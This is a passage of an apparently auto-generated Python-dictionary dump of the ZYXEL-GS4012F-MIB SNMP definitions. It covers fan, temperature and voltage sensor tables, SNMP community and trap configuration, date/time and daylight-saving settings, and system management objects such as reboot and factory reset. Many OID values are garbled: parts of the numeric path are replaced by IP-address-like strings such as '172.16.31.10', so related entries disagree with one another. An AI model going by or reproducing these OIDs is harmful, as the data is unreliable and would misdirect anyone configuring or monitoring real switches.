"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Maximum speed measured in Revolutions Per Minute (RPM) on the fan.""",
}, # column
"fanRpmMinValue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Minimum speed measured in Revolutions Per Minute (RPM) on the fan.""",
}, # column
"fanRpmLowThresh" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.1.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The minimum speed at which a normal fan should work.""",
}, # column
"fanRpmDescr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.1.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""'Normal' indicates that this fan is functioning above the minimum speed.
'Error' indicates that this fan is functioning below the minimum speed.""",
}, # column
"tempTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.2",
"status" : "current",
"description" :
"""""",
}, # table
"tempEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.9.2.1",
"status" : "current",
"linkage" : [
"tempIndex",
],
"description" :
"""An entry in tempTable.""",
}, # row
"tempIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.2.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"mac" : {
"nodetype" : "namednumber",
"number" : "1"
},
"cpu" : {
"nodetype" : "namednumber",
"number" : "2"
},
"phy" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readonly",
"description" :
"""Index of temperature unit. 1:MAC, 2:CPU, 3:PHY""",
}, # column
"tempCurValue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The current temperature measured at this sensor.""",
}, # column
"tempMaxValue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The maximum temperature measured at this sensor.""",
}, # column
"tempMinValue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The minimum temperature measured at this sensor.""",
}, # column
"tempHighThresh" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.2.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The upper temperature limit at this sensor.""",
}, # column
"tempDescr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.2.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""'Normal' indicates temperatures below the threshold and 'Error' for those above.""",
}, # column
"voltageTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.3",
"status" : "current",
"description" :
"""""",
}, # table
"voltageEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.3.1",
"status" : "current",
"linkage" : [
"voltageIndex",
],
"description" :
"""An entry in voltageTable.""",
}, # row
"voltageIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Index of voltage.""",
}, # column
"voltageCurValue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The current voltage reading.""",
}, # column
"voltageMaxValue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The maximum voltage measured at this point.""",
}, # column
"voltageMinValue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.3.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The minimum voltage measured at this point.""",
}, # column
"voltageNominalValue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.3.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The normal voltage at wchich the switch work.""",
}, # column
"voltageLowThresh" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.9.3.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The minimum voltage at which the switch should work.""",
}, # column
"voltageDescr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.9.3.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""'Normal' indicates that the voltage is within an acceptable operating range
at this point; otherwise 'Error' is displayed.""",
}, # column
"snmpSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10",
}, # node
"snmpGetCommunity" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"snmpSetCommunity" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"snmpTrapCommunity" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"snmpTrapDestTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.4",
"status" : "current",
"description" :
"""""",
}, # table
"snmpTrapDestEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.4.1",
"create" : "true",
"status" : "current",
"linkage" : [
"snmpTrapDestIP",
],
"description" :
"""An entry in snmpTrapDestTable.""",
}, # row
"snmpTrapDestIP" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.4.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "noaccess",
"description" :
"""IP address of trap destination.""",
}, # column
"snmpTrapDestRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.4.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"snmpTrapDestPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.4.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""The UDP port of the trap destination.""",
}, # column
"snmpTrapVersion" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.4.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"v1" : {
"nodetype" : "namednumber",
"number" : "0"
},
"v2c" : {
"nodetype" : "namednumber",
"number" : "1"
},
"v3" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""The SNMP protocol version to send traps.""",
}, # column
"snmpTrapUserName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.4.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""The user name for sending SNMPv3 traps.""",
}, # column
"snmpVersion" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"v2c" : {
"nodetype" : "namednumber",
"number" : "0"
},
"v3" : {
"nodetype" : "namednumber",
"number" : "1"
},
"v3v2c" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""The SNMP version to be used. v3v2c means that the manager
can get/set by SNMPv3 and can get by SNMPv2c.""",
}, # scalar
"snmpUserTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.6",
"status" : "current",
"description" :
"""A table that contains SNMPv3 user information.""",
}, # table
"snmpUserEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.6.1",
"status" : "current",
"linkage" : [
"snmpUserName",
],
"description" :
"""An entry of snmpUserTable.""",
}, # row
"snmpUserName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.6.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""The user name.""",
}, # column
"snmpUserSecurityLevel" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.6.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"noAuthNoPriv" : {
"nodetype" : "namednumber",
"number" : "0"
},
"authNoPriv" : {
"nodetype" : "namednumber",
"number" : "1"
},
"authPriv" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""The level of security at which SNMP messages can be sent or
with which operations are being processed.""",
}, # column
"snmpUserAuthProtocol" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.6.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"md5" : {
"nodetype" : "namednumber",
"number" : "0"
},
"sha" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""The type of authentication protocol to be used.""",
}, # column
"snmpUserPrivProtocol" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.6.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"des" : {
"nodetype" : "namednumber",
"number" : "0"
},
"aes" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""The type of privacy protocol to be used.""",
}, # column
"snmpTrapGroupTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.7",
"status" : "current",
"description" :
"""""",
}, # table
"snmpTrapGroupEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.7.1",
"status" : "current",
"linkage" : [
"snmpTrapDestIP",
],
"description" :
"""An entry in snmpTrapGroupTable.""",
}, # row
"snmpTrapSystemGroup" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.10.7.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Bits",
"coldStart" : {
"nodetype" : "namednumber",
"number" : "0"
},
"warmStart" : {
"nodetype" : "namednumber",
"number" : "1"
},
"fanSpeed" : {
"nodetype" : "namednumber",
"number" : "2"
},
"temperature" : {
"nodetype" : "namednumber",
"number" : "3"
},
"voltage" : {
"nodetype" : "namednumber",
"number" : "4"
},
"reset" : {
"nodetype" : "namednumber",
"number" : "5"
},
"timeSync" : {
"nodetype" : "namednumber",
"number" : "6"
},
"intrusionlock" : {
"nodetype" : "namednumber",
"number" : "7"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"snmpTrapInterfaceGroup" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.10.7.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Bits",
"linkup" : {
"nodetype" : "namednumber",
"number" : "0"
},
"linkdown" : {
"nodetype" : "namednumber",
"number" : "1"
},
"autonegotiation" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"snmpTrapAAAGroup" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.7.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Bits",
"authentication" : {
"nodetype" : "namednumber",
"number" : "0"
},
"accounting" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"snmpTrapIPGroup" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.7.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Bits",
"ping" : {
"nodetype" : "namednumber",
"number" : "0"
},
"traceroute" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"snmpTrapSwitchGroup" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.7.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Bits",
"stp" : {
"nodetype" : "namednumber",
"number" : "0"
},
"mactable" : {
"nodetype" : "namednumber",
"number" : "1"
},
"rmon" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dateTimeSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.11",
}, # node
"dateTimeServerType" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.11.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"none" : {
"nodetype" : "namednumber",
"number" : "1"
},
"daytime" : {
"nodetype" : "namednumber",
"number" : "2"
},
"time" : {
"nodetype" : "namednumber",
"number" : "3"
},
"ntp" : {
"nodetype" : "namednumber",
"number" : "4"
},
},
},
"access" : "readwrite",
"description" :
"""The time service protocol.""",
}, # scalar
"dateTimeServerIP" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.11.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""IP address of time server.""",
}, # scalar
"dateTimeZone" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.11.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""The time difference between UTC. Ex: +01""",
}, # scalar
"dateTimeNewDateYear" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.11.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""The new date in year.""",
}, # scalar
"dateTimeNewDateMonth" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.11.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""The new date in month.""",
}, # scalar
"dateTimeNewDateDay" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.11.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""The new date in day.""",
}, # scalar
"dateTimeNewTimeHour" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.11.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""The new time in hour.""",
}, # scalar
"dateTimeNewTimeMinute" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.11.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""The new time in minute.""",
}, # scalar
"dateTimeNewTimeSecond" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.11.9",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""The new time in second.""",
}, # scalar
"dateTimeDaylightSavingTimeSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.11.10",
}, # node
"daylightSavingTimeState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.11.10.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Daylight saving time service enabled/disabled for the switch.""",
}, # scalar
"daylightSavingTimeStartDateWeek" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.11.10.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"first" : {
"nodetype" : "namednumber",
"number" : "1"
},
"second" : {
"nodetype" : "namednumber",
"number" : "2"
},
"third" : {
"nodetype" : "namednumber",
"number" : "3"
},
"fourth" : {
"nodetype" : "namednumber",
"number" : "4"
},
"last" : {
"nodetype" : "namednumber",
"number" : "5"
},
},
},
"access" : "readwrite",
"description" :
"""Daylight saving time service start week.""",
}, # scalar
"daylightSavingTimeStartDateDay" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.11.10.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"sunday" : {
"nodetype" : "namednumber",
"number" : "0"
},
"monday" : {
"nodetype" : "namednumber",
"number" : "1"
},
"tuesday" : {
"nodetype" : "namednumber",
"number" : "2"
},
"wednesday" : {
"nodetype" : "namednumber",
"number" : "3"
},
"thursday" : {
"nodetype" : "namednumber",
"number" : "4"
},
"friday" : {
"nodetype" : "namednumber",
"number" : "5"
},
"saturday" : {
"nodetype" : "namednumber",
"number" : "6"
},
},
},
"access" : "readwrite",
"description" :
"""Daylight saving time service start day.""",
}, # scalar
"daylightSavingTimeStartDateMonth" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.11.10.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"january" : {
"nodetype" : "namednumber",
"number" : "1"
},
"february" : {
"nodetype" : "namednumber",
"number" : "2"
},
"march" : {
"nodetype" : "namednumber",
"number" : "3"
},
"april" : {
"nodetype" : "namednumber",
"number" : "4"
},
"may" : {
"nodetype" : "namednumber",
"number" : "5"
},
"june" : {
"nodetype" : "namednumber",
"number" : "6"
},
"july" : {
"nodetype" : "namednumber",
"number" : "7"
},
"august" : {
"nodetype" : "namednumber",
"number" : "8"
},
"september" : {
"nodetype" : "namednumber",
"number" : "9"
},
"october" : {
"nodetype" : "namednumber",
"number" : "10"
},
"november" : {
"nodetype" : "namednumber",
"number" : "11"
},
"december" : {
"nodetype" : "namednumber",
"number" : "12"
},
},
},
"access" : "readwrite",
"description" :
"""Daylight saving time service start month.""",
}, # scalar
"daylightSavingTimeStartDateHour" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.11.10.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Daylight saving time service start time.""",
}, # scalar
"daylightSavingTimeEndDateWeek" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.11.10.6",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"first" : {
"nodetype" : "namednumber",
"number" : "1"
},
"second" : {
"nodetype" : "namednumber",
"number" : "2"
},
"third" : {
"nodetype" : "namednumber",
"number" : "3"
},
"fourth" : {
"nodetype" : "namednumber",
"number" : "4"
},
"last" : {
"nodetype" : "namednumber",
"number" : "5"
},
},
},
"access" : "readwrite",
"description" :
"""Daylight saving time service end week.""",
}, # scalar
"daylightSavingTimeEndDateDay" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.11.10.7",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"sunday" : {
"nodetype" : "namednumber",
"number" : "0"
},
"monday" : {
"nodetype" : "namednumber",
"number" : "1"
},
"tuesday" : {
"nodetype" : "namednumber",
"number" : "2"
},
"wednesday" : {
"nodetype" : "namednumber",
"number" : "3"
},
"thursday" : {
"nodetype" : "namednumber",
"number" : "4"
},
"friday" : {
"nodetype" : "namednumber",
"number" : "5"
},
"saturday" : {
"nodetype" : "namednumber",
"number" : "6"
},
},
},
"access" : "readwrite",
"description" :
"""Daylight saving time service end day.""",
}, # scalar
"daylightSavingTimeEndDateMonth" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.11.10.8",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"january" : {
"nodetype" : "namednumber",
"number" : "1"
},
"february" : {
"nodetype" : "namednumber",
"number" : "2"
},
"march" : {
"nodetype" : "namednumber",
"number" : "3"
},
"april" : {
"nodetype" : "namednumber",
"number" : "4"
},
"may" : {
"nodetype" : "namednumber",
"number" : "5"
},
"june" : {
"nodetype" : "namednumber",
"number" : "6"
},
"july" : {
"nodetype" : "namednumber",
"number" : "7"
},
"august" : {
"nodetype" : "namednumber",
"number" : "8"
},
"september" : {
"nodetype" : "namednumber",
"number" : "9"
},
"october" : {
"nodetype" : "namednumber",
"number" : "10"
},
"november" : {
"nodetype" : "namednumber",
"number" : "11"
},
"december" : {
"nodetype" : "namednumber",
"number" : "12"
},
},
},
"access" : "readwrite",
"description" :
"""Daylight saving time service end month.""",
}, # scalar
"daylightSavingTimeEndDateHour" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.11.10.9",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Daylight saving time service end time.""",
}, # scalar
"sysMgmt" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12",
}, # node
"sysMgmtConfigSave" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"config_1" : {
"nodetype" : "namednumber",
"number" : "1"
},
"config_2" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""If setting value is given, the variable write index will be set and running-config will be written to the assigned configuration file.
If not, running-config will be written to the booting one.""",
}, # scalar
"sysMgmtBootupConfig" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"config_1" : {
"nodetype" : "namednumber",
"number" : "1"
},
"config_2" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""The setting value (read index) will be written into non-volatile memory.
While rebooting, the variable write index is equal to read index initially.
You can change the value of write index by CLI / MIB.""",
}, # scalar
"sysMgmtReboot" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"nothing" : {
"nodetype" : "namednumber",
"number" : "0"
},
"reboot" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""Reboot switch from SNMP. 1:Reboot, 0:Nothing""",
}, # scalar
"sysMgmtDefaultConfig" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"nothing" : {
"nodetype" : "namednumber",
"number" : "0"
},
"reset_to_default" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""Erase running config and reset to default.""",
}, # scalar
"sysMgmtLastActionStatus" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.12.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"none" : {
"nodetype" : "namednumber",
"number" : "0"
},
"success" : {
"nodetype" : "namednumber",
"number" : "1"
},
"fail" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readonly",
"description" :
"""Display status of last mgmt action.""",
}, # scalar
"sysMgmtSystemStatus" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.6",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Bits",
"sysAlarmDetected" : {
"nodetype" : "namednumber",
"number" : "0"
},
"sysTemperatureError" : {
"nodetype" : "namednumber",
"number" : "1"
},
"sysFanRPMError" : {
"nodetype" : "namednumber",
"number" : "2"
},
"sysVoltageRangeError" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readonly",
"description" :
"""This variable indicates the status of the system.
The sysMgmtAlarmStatus is a bit map represented
a sum, therefore, it can represent multiple defects
simultaneously. The sysNoDefect should be set if and only if
no other flag is set.
